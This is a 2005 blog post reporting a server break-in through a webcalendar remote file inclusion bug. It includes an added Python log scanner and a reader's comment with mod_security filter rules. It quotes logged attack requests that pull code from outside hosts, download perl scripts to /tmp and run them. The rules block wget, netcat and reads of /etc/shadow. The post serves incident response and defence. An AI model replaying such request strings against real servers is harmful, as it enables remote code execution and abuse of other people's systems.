
27.10.2005 10:51

tuxx-home.at got hacked again


This time the problem was caused by a security bug in the webcalendar application of one virtual host on this site (fazerforum.motorradseiten.at).

Someone sent commands like the following to my server, which allowed him to download some perl scripts etc. to /tmp and execute them (no, /tmp is not executable; he or she called the perl interpreter directly to run these scripts).
vhosts/fazerforum.motorradseiten.at/access.log.0:201.32.151.217 - - [26/Oct/2005:13:20:54 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;wget%20\
    http://alexaraojo.sites.uol.com.br/dc.txt
vhosts/fazerforum.motorradseiten.at/access.log.0:201.45.100.130 - - [27/Oct/2005:06:29:06 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;lwp-download%20\
    http://www.tutoworld.org/xpl/dc.txt;perl%20dc.txt%20216.22.25.95%2017832
These scripts tried to send several thousand emails through my server, and therefore I had to deactivate the fazerforum until it is fixed.
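To show how requests like the two log lines above can be spotted automatically, here is an added example in Python (not part of the original post): it parses Apache access-log lines, URL-decodes the query string the way mod_security does before matching, and flags both the remote URL in includedir and the shell commands in cmd. The log lines, IPs and hostnames are constructed placeholders, and the three rule patterns are borrowed from the SecFilter rules in Andrew's comment below.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines modelled on the two requests quoted in the post
# (placeholder IPs and hosts, not the real ones) plus one benign request.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Oct/2005:13:20:54 +0200] "GET /webcalendar//tools/send_reminders.php?includedir=http://example.invalid/asc.txt?&cmd=cd%20/tmp;wget%20http://example.invalid/dc.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.11 - - [27/Oct/2005:06:29:06 +0200] "GET /webcalendar//tools/send_reminders.php?includedir=http://example.invalid/asc.txt?&cmd=cd%20/tmp;lwp-download%20http://example.invalid/dc.txt;perl%20dc.txt%20203.0.113.12%2017832 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.12 - - [27/Oct/2005:08:00:00 +0200] "GET /webcalendar/month.php?year=2005&month=10 HTTP/1.1" 200 4096 "-" "Mozilla/4.0"
"""

# Apache access log line: client IP, two identity fields, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)(?: \S+)?" \d{3}')

# Patterns taken from the SecFilter rules in the comment; mod_security matches
# them against the URL-decoded request, so the query string is decoded first.
SHELL_RULES = {
    "wget command attempt": re.compile(r"wget "),
    "perl execution attempt": re.compile(r"perl "),
    "path traversal attempt": re.compile(r"\.\./"),
}
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_query(query):
    """Split a raw query string on '&' only and URL-decode each name and value."""
    pairs = [pair.partition("=") for pair in query.split("&") if pair]
    return [(unquote_plus(name), unquote_plus(value)) for name, _, value in pairs]


def analyse_request(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    for name, value in parse_query(urlsplit(target).query):
        # Remote file inclusion indicator: a parameter whose value is itself a URL.
        if REMOTE_URL.match(value):
            findings.append(f"RFI: {name}=<remote URL>")
        for label, pattern in SHELL_RULES.items():
            if pattern.search(value):
                findings.append(f"{label} in {name}")
    return findings


def scan_log(text):
    """Return (ip, target, findings) for every log line with at least one finding."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match and (findings := analyse_request(match.group("target"))):
            hits.append((match.group("ip"), match.group("target"), findings))
    return hits
```

Note that the second request contains no "wget " and is caught only by the "perl " rule; a blacklist of command names is easy to slip past, which is why fixing webcalendar itself, as the update below says, matters more than any filter.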

More news later on, when I finally get rid of this issue.

Update:
After searching the web, I found the security issue on the webcalendar project page and a discussion about this issue here.

It seems that this issue is quite easy to fix, so I'll fix it now.
If you're using webcalendar, I strongly encourage you to apply the fix or update to 1.0.1!
Comments added earlier to http://tuxx-home.at/archives/2005/10/27/T10_51_29/index.html:
Andrew Okhmat on 2005-11-05 01:32:37 wrote:
simply set up mod_security with the following rules:

<IfModule mod_security.c>
# Only inspect dynamic requests
SecFilterEngine On

# Some sane defaults
SecFilterScanPOST On
SecFilterCheckURLEncoding On
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log

# Reject requests with status 400
SecFilterDefaultAction "deny,log,status:400"


# Accept almost all byte values
SecFilterForceByteRange 0 255

# Prevent path traversal (..) attacks
SecFilter "\.\./"

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"

# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "ps\x20"

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"

# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"

# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"

# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"

# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"

# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"

# WEB-ATTACKS chown command attempt
SecFilter "/chown"

# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"

# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilter "/usr/bin/gcc"

# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilter "/usr/bin/cc"

# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"

# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"

# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"

# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"

# WEB-ATTACKS python access attempt
SecFilter "python\x20"

# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"

# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"

# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"

# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"

# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"

# WEB-ATTACKS nt admin addition attempt
SecFilter "net localgroup administrators /add"

# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"

# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"

# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"

# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"

# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"

# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"

# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"

# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"

# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"

# WEB-ATTACKS mail command attempt
SecFilter "mail\x20"

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"

# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf"

# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd"

# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow"
SecFilter "/etc/passwd"

# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf"

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"

# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Prevent XSS attacks (HTML/Javascript injection)
SecFilter "<.+>"

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
SecFilter "update.+set"

# Require HTTP_USER_AGENT and HTTP_HOST headers
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
# SecFilterSelective REQUEST_METHOD "!^GET$" chain
# SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"

# Require Content-Length to be provided with
# every POST request
# SecFilterSelective REQUEST_METHOD "^POST$" chain
# SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
# SecFilterSelective HTTP_Transfer-Encoding "!^$"

</IfModule>
Alexander Griesser on 2005-11-06 00:05:00 wrote:
Ah, that's nice to know.
I'll give that a try as fast as possible!

Thanks for the hint,
regards,
alex
